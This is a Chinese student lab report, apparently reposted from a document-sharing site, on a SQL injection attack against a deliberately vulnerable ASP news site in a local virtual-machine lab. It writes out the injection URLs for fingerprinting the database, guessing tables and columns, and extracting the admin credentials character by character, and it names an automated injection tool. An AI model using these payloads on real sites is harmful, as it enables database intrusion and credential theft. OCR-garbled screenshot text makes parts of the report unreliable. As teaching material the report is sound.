SQL注入攻击实验报告.docx

《SQL注入攻击实验报告.docx》由会员分享，可在线阅读，更多相关《SQL注入攻击实验报告.docx（18页珍藏版）》请在三一文库上搜索。

1、SQL注入攻击实验报告实验报告（实验名称：SQL注入攻击）一、实验目的通过SQL注入攻击，掌握网站的工作机制，认识到SQL注入攻击的防范措施, 加强对Web攻击的防范。二、实验环境描述实验开展所基于的网络环境，给出网络拓扑、IP地址、web服务器、客户 机等信息。宿主机（客户机）：操作系统为Windows 10, IP为192.168.18.11,在主机上 安装虚拟化软件Vmware Player,在此基础上创建虚拟机并安装操作系统，进行网 络配置，采用环回适配器，桥接模式，实现宿主机与虚拟机之间的网络通信，虚拟机（Web服务器）：操作系统为Windows XP, IP为192.168.18.

2、9,本实验利用windows的iis服务搭建了一个有SQL注入漏洞的网站“ASP新 闻发布系统”，以该网站为目标，对其实施SQL注入攻击。本实验所需工具如下：IIS是Internet Information Server的缩写，是微软提供的Internet服务器软 件，包括Web、FTP、Mail等服务器，也是目前常用的服务器软件。版本不限。“啊D”注入工具：对“MSSQL显错模式、MMSSQL不显错模式”、“Access” 等数据库都有很好的注入检测能力，内集“跨库查询”、“注入点扫描”、“管理入口 检测”、“目录查看”等等于一身的注入工具包。“ASP新闻发布系统Ok3w v4.6源码。三、

3、实验内容（一）配置实验环境，首先选择网络适配器，安装环回适配器，在主机上安装Vmware Player,成功启 动虚拟机。接着配置宿主机和虚拟机的IP,如图要注意的是，配置主机上的IP时,应该选择VMnet8,并且注意勾取Bridge-1 -9以太网2属性网络身份麴证共享连接时使用:壁 VMware Virtual Ethernet Adapter for VMnet8配置(C)lit；使用项目(Q)：S Microsoft网络客户登 roto col 国事件和打印机共享 0 链路层拓扑发现响应程序 H X Internet 初议版本 4 (TCP/IPv4) x Microsoft网络适闺器

4、多路传送器协议 V. x链路层拓扑发现映射器I/O英的程序 5 . Microsoft LLDP婚政驭动程序安装卸载(U)然后，验证宿主机和虚拟机是否联通，结果显示连接成功。|5i自理灵:命令疼示胃Kicrosoft Windows 版本 10. 0. 10586J(c) 2015 Microsoftdorporition. 保留所有权利.C:WI NEO V S sy s t em32 hdvrvn 匚C: WINEOWSsystem32ping 192. 168.18. 11在白自自自正来来来来Ping 192.168. 18. 11具有32字节的数据：192. 168. 13.11 的回

5、复：字节=32 时间hns TTLE28192. 168. L8.11 的回复：字节=32 时间Iras HL=128192. 168. 18.11 的回复,：字节=32 时间pLng 192. 168.18. C正在Ping 192.168.18. 9具有32字节的数据：来自192.168. 18.9的回复：字节=32时间=3ns TTL=128 来自192. 168. 13.9的回复：字节二32时间1侬TTL二122 来百 192. 168. 18.9 的回豆：字节=32 B力间hrs TTL=128 来自192. 168. 13.9的回复：字节=32时间1让TTL=128 192.168

6、.18. 9 的 Ping 统计信息：数据包：已发送:4,已接收;4,丢失=0 (冰丢失), 往返行程的估计时间(以毫秒为单位)：最是=03，最长=3ms,平均=OrcC:ffINTO?/SsystGni32最后在虚拟机上安装HS程序，打开浏览器，输入地址“127. 0. 0.1” ,检查网 站搭建情况。成功!（二）寻找注入点在宿主机上，打开网页http:192. 168.18. 9/list. asp?id=95,可以正常打开 页面。Ob，0 hUpy/192.168.189J=95O，:此为阳加侬例能计：otmtr盟络技承 评，白员人口fcn：U KO W用版面芯和亲练“s宪录网站百页 筠

7、间资讯 网络安全网页制作I碘运总 平面设计好同货m 咕内幄 网络弹作 网拈&奔 人宓新句ii界时备a-RSfifi）进行注入测试9 键入 http:/192. 168.18. 9/list. asp?id=95 and 1=1,返回页 面不变。0 http:/192.168.18.9/listasp?id=9!320and%201 = I筋计） D G十算机月格技术课1Q新闻茹_文宜分类一期会员入口唯号:密码;登录I三任-11 -U K J WASF孙町发布系统“4.6网站首页邦破讯1网络安全|网页:a作网站运首|平面设计软诃关讯站内劫府网拓媒体网站经济人崛（同业界动态新浪新词键入 http:

8、/192. 168. 18. 9/list. asp?id=95 and 1=2,返回页面出错。=t? d* x49 C。叩”92,168.189“Uf-20ms 步可ea“ S ect counio from rv6SODjeGS)0 Q 7 食g dRtMO ：发为城sma0A C x；?RZ无，复日UX 无法显示饵贞UW诟限且或皿喳，无寿!紫 山田圣1悦，RCirt. .Off iinMURgridwa加fg，Kirr IM t - Q HIM4ci信里修分fi+a，m孑表竹人员) 题凫arMi*! Etqi， 芯，/,;”，上WMWIfttmEU/II3 0，第 13 行 吟会SM ,

9、ills 0 IK，1e K! 10 0. Md/nng? intm. i;u c.a. as* o 法，公x 5t x: btzi j o3 (S) go Qioo%fromfromai*t2qia. t$ & 和 x. 因此，可确定该网站存在注入点。(三)判断数据库类型用系统表的方法进行判断，分别键入http：/192. 168. 189/list. asp?id=95and(selectcount(*)sysobjects)0http:/192. 168. 18e 9/list. asp?id=95and(selectcount(*)msysobjects)0。b 0 http：/192

10、.168.18.9/ d=95%20and%20(select%20count(4)%20froml20msysobjects | ir.59网址导与O （叱为知制日涵股tt）二计算松用能技术泮，二无法31 示网灵匚无法=5OT奂无法显示网页i烟访问的网页出问迪，无法显示，商三i五机行不少J忙:单击叵拉粗，疚幡生试。 打开 31瓦血？主贡，”后瓷段与斫SE信息4联的显格，HTTP惜决5C0 18 -内却版昧和员- 瘠员 Intiirn*it总息用关枝术信电用于支势人员) 格俣奘型：?bTO:oft JIT Dai0q ZiiAiw (Ox8004GK)不懈期记录I存,门刀。Mch上笳白读戴厮眼

11、。/list. asp,第 15 行 猴若炎型：rt0xjlla/5.O Nd。心 W 10.0. ZOA64)MWqbKit/?37.” (KMIWL lile G”上。)Chrwe/49.0. 2623 22 S才far；837 36 SK2.1 MgUSy 1.0网页： 欣无法显示网页i的访同生四天出现向软，无法显示。金芸撤行仍施作； 单击&1引步用，或用后受试。 打开:空说反？主页，然局5核与所交信日相翊勺度痍。mt错误500,300 -内印胴若者出式-AST馅式Internet信总历务使市占史用于去招人员） 福不理：Itir0soEt J17 Dstabosq Kasina （UzE

12、OJdQET）llicroxaft J.t於提库引攀找不多照入裳烟旬,ayxoLj.ctx% 晒定它是否E，以院ER氾射渐写是否正蜩：/list. a，第 15 行 浏览港笑空，H0?tll4/5.0 Mind。” IfT 10 0: VX） AyrleVcbXjt/537 名 （KKOTL lik6 小才。）C匕sg/49. 0. 2%3. 22 %针1处3乙 36 SB 2.x ntSr i.a 网贡.；俄I /lin. 5P 时间：20IE年12月7日，然28 详比信科；l!；croxo/ 安扑| 尢或两者返回均出错，可知是access数据库。(四)猜测表名一般网站后台的管理员都默认在表

13、admin中，我们先试一下，键入：http:192. 168. 18. 9/list. asp?id=95 and (select count () from admin) 0, 0 hnp:/192.168.18.9/list.asp?id=95%20and%2B$elect%20count(t)%20from%20admin 0 r 上导航 L无法显示可殳计) D计算机网络技术课t1新间纺至分次秀会员人口帐目;登录IU KO WASP期间发加岁统”石返回页面正常，可知该网站后台数据库中存在着表名为admin的表。(五)猜测字段名不同公司网站有不同的字段名，但一般都有三个字段，分别 记录ID

14、号、用户名和密码，常用的字段名为：id, username, pas sword .分别键入 http：/192. 168.18. 9/list. asp?id=95 and (select coxint (id) from admin)0http：/192. 168. 18. 9/list. asp?id=95 and (select count (username) from admin)020adm,，http:/192 168.18. 9/list. asp?id=95 and (select count (password) from admin)00 httpy/192.168.1

15、8.9/list.asp?id=95%20and%20(select%20co匕导航_无法显示应2计)计篁蛔密技术津， ；一.新闻登记_文生定之球9 httpy/192.168.18.9/list.asp?id=95%20and%20(select%20coi7航间员田一文茸分至_寿：XI拈内摄有：SH) J计百机网箔技术滓tI，一员入口|味号：U K 0 WA5P爵闻发刊系统“6三者返回均正常。可知，表admin中存在的三个字段：id, username, passwordo 注：“username”的截图损坏，但是返回正常，望教员通融。(六)猜测管理员用户名和密码1 .确定表 admin

16、中有几条记录，键入 http:/192.168.18. 9/list. asp?id=95 and (select count() from admin) =1 返回页面正常。0 http:/192.168.18.9/list.asp?id=95%20and%2B(select%20count(t)%20from%20admin)=1| 夕 l:导航无法显示网Svt) D Q计算机网箔技术深1新闰资讯.文章分类_我2,会员人口帐号:登录I站回搜索:U KO WAS?新闻发布系统v46可知，表admin只有一条记录。2 .猜测用户名长度，键入 http:/192. 168. 18. 9/list

17、. asp?id=95 and (selectlen (us er name)fromadmin) =1返回 出错， 继 续键入http：/192. 168. 18. 9/list. asp?id=95 and (select len(username) from admin)=2O (此为版式和体价设计)计算机网络技术便卜u无法显示网页无法显示网页i鹉访问的网画出现i唾，无法显示。活芸读执行下列麋IF： 单击的璇，斯稍后更国。 打开 皿侬皿 主百，然后查找巧解信史相关的弱按。mr惜设EOO 10D -内毒胭劳号自法-ASF之决Imcrnot信月不考(广 ( 0g192.168.189/lis

18、Lasp?id=95%20and%20(select%20len(usemame)%20fer!H萧I裁,会封御*址导黯：？无5婀O(此为假孝故明设计)I计算机网络技术课f无法显示网页X +无法显示网页硝访i谢顿出现问卷无去显示。直告限也行下列枝作： 单击强按电，或带后至口。.打开酸侬.四乡主页，然后受执与所本法导相关的惯推。KHP错温503 100 -内部引为卫当误- ASP错俣1=1- O *5- |ZH92.168.18.9/list.asp?id=95%20and%20(select%20len(username)%20frorn%20admin)=5 f , 一,我次魂网址导航？无法

19、O C （此为版式和体例设计）4计百R网络技术3泊新回资讯了算分差子点U K 0 W、P新闻杭布隶院“已合员入口 哨：站内彝：阚百页I新同资讯I网络安全I网页潮作网站运百平面设计网络编程演示网站直到返回页面正确。测试到5的时候，返回正常。可知，用户名长度为5。3.猜测用户名内容，采用ASCII码分析法先猜测第1位，用二分法，键入 http：/192.168.18. 9/1ist. asp?id=95 and (select count (*) from admin where (asc(mid(username, 1,1)between 30 and 125)0 返回正确，进一步缩小范围 be

20、tween 70 and 100 , between 85 and 100 , between 90 and 100, =97。 |。20from%20admin%20v/here(a5c(m|i(username,1,1)between%2090%20and%20100?0 址导航 口无法显示网I设计）计算机可给技术 :集干新闻员汨内分关览E会员入口 怵号；密码;登录注册I站内加索;U KO WASF舒网发布妥.统“6网站首页I新词姿讯I网络安全I网页也作I网站运营I平面设计网络编程演示网站R nd%20(select%20count(i)%20from%20admin%20wherJasc

21、(mid(usernameJJ)=97)0 I：导抗D无法显示网) D计算机网络技术课rD籽闻焚闲_文空分美弟 xVJ K 0 VVASF新闰友奇系统“6网站首页新词费讯网络安全网页制作网站运言平面设计网络辘I演示网站可知第一个字符为ao依此类推，猜测之后的每一位字符,0 d%20(lect%20counte)%20from%20admin%；IM”Q(asc(m id(usef namer2,2)=100) 导航一元承S示网打）计H引用裔技术3津t1新闾贡田A分兰型注视I站内内需:U KO WASP斯闻发而系统”5网站首页I新Ji资讯网络安全I网而潴作I网站运W平面设计I网络编程I演示网站0

22、 d%20(select%20countr)%20from%20.黄灵左班:身充二无法显示网连十）4计育馆格技术评t:新迪安不加分工领KO W网站百再I先同资讯I网络安全网内制作网站运营I平面设计网络编程演示网站ASF勃回发如冷猊V46| 0 d%20(select%20count(*)%20from%20admi n%20v;here(a$c(mid(username, 5,5)=110)0 )匕导第I无法显示网Sit） 计算机目后技本煤t.翁闻至3方分泛我于U KO W烬P新闻/布系统X6会员入口低号：|唐玛;登录I :上修I玷向梭雷:网站首页新施讯网络安全|网页劄作I网站运注|平面设计|

23、网络手程|演示网站最后得到用户名为admin。4.猜测密码，同理：http:/192.168. 18. 9/list. asp?id=95 and (select len(password) from admin)=6- 0 y/192.168.18.9/listasp?id=95%20and%20(select%20|n(password)%20from%20admin)=上导航无云显示网tt) 计宜机网络技术课?哥底诺乱文官翁聋犬m ，金员入口曲号：密码:登录注册I砧内按空:网站首页I新同奥讯网并安仝I网页制作I网站运苜平面设计I网络编程演示网站所以密码为6位。3 ;elect%20cou

24、nt(t)%20from%20admin%20where%20%2l加0无法显示网) D计算机网络技术课t:新闻资讯_文章分类一我rX，龛员入口帐号：密码登录注册I站内搜索:U KO WASP新闻发布系统“4网站首页I新闻资讯I网络安全I网页制作I网站运营|平面设计I网络编程I演示网以0 ielect%20count(*)%20from%20admin%20where%20%(导航L；无法显示网浒) 计算机网珞技术3课iD新闻瓷七文章分美英m x卜会员入口帐号:密码:登录注册I站内搜索:U KO WASP新闻发布系统网站首页I新闻费讯I网络安全I网页制作I网站运营I平面谩计I网络编程I演示网站

25、9 ielect%20count(:*)%20from%20admin%20where%20%10(asc(mid(passworcl,3,3) = 51)0p 导航D无法显示网叶） D计算机网络技术课11新闻度汛_文章分类.我三x卜会员入口 帐号：密码二登录I注册I站内搜索:U KO WASP新闻发布系统网站首页I新同资讯I网络安全I网页制作I网站运营I平面谩计I网络编程I演示网站导航D无法显示网0 ielect%20cou nt(*)%20from%20adJ 计） :计算机网/技术课f新闻资讯_文章分类聿之X）会员入口怵号:登录注册I站内搜索:L网站苜页新同资讯1网络安全1网页制作网站运

26、营1平面谩计网络编程演示网站U K 0 WASP新闻发布系统X.60 后lect%20count(%20fom%20admin%20where%20%迎呢皿曲3辿导航D无法显示网I站内搜索;叶） .计算机网络技术课市口新闻资讯_文章分美_案 x +会员入口帐号;密码:T登录I注册U K J WASP新闻发布系统746网站首页I哥闻资讯网络安全I网页制作I网站运营|平面设计I网络编程I演示网站。ielect%20count(*)%20from%20admin%20where%20%20(asc(mid(pas$word,6；6) = 54)0 5导航L.-i无法显示网浒）D &计算机网珞技术课工

27、，D新闻资讯一文章分类_我曰x卜会员入口 帐号：密科:登录I注册站内搜索:注入检别U KO WASP新闻发布系统“4.6网站首页I新闻费讯I网络安全I网页制作I网站运营I平面谩计I网络编程I演示网站最终得到密码为6位：123456。（七）寻找到后台管理窗口打开“啊D”软件，点击进入“管理入口检测”选 项，点击“检测管理入口”，进行检测，网咕地址 hg/19263.18.9/ 管理久口可用连接和目录位置0ks:192 163 18 9/imaces/ 粤hep : 19乙 163.18. S/adnin/ cQ &?O 发为电3口,： Use理M-11 -四、实验结果及分析SQL注入攻击过程。1

28、）判断Web环境是否可以SQL注入。如果URL仅是对网页的访问，不存在 SQL 注入问题，如：http:/ 就是普通的网 页访问。只有对数据库进行动态查询的业务才可能存在SQL注入，如： http:/192.168.18.9/list.asp?id=95,其中？id=95表示数据库查询变量，这种语句 会在数据库中执行，因此可能会给数据库带来威胁。2）寻找SQL注入点。完成上一步的片断后，就要寻找可利用的注入漏洞，通过 输入一些特殊语句，可以根据浏览器返回信息，判断数据库类型，从而构建数据库 查询语句找到注入点。3）猜解用户名和密码。数据库中存放的表名、字段名都是有规律可言的。通过 构建特殊数据

29、库语句在数据库中依次查找表名、字段名、用户名和密码的长度，以 及内容。这个过程可以通过网上大量注入工具快速实现，并借助破解网站轻易破译 用户密码。4）寻找WEB管理后台入口。通常WEB后台管理的界面不面向普通用户开放, 要寻找到后台的登陆路径，可以利用扫描工具快速搜索到可能的登陆地址，依次进 行尝试，就可以试出管理台的入口地址。5）入侵和破坏。成功登陆后台管理后，接下来就可以任意进行破坏行为，如篡 改网页、上传木马、修改、泄漏用户信息等，并进一步入侵数据库服务器。实验心得：在实验的过程中遇到了很多困难，配置上的，环境上的，还有一些需要注意的 小问题，而且从整个实验的过程来讲也涉及到了很多软件的配合使用。在整个实验中遇到的最大问题就是，宿主机和虚拟机此前一直连不通，通过宿 主机ping虚拟机，一直无法连接。直到最后我把虚拟机的防火墙关闭了，宿主机才 能访问虚拟机上发布的网页。可见，防火墙还是有一定作用的，但是对于网站来说 开通了防火墙就没办法访问网页了。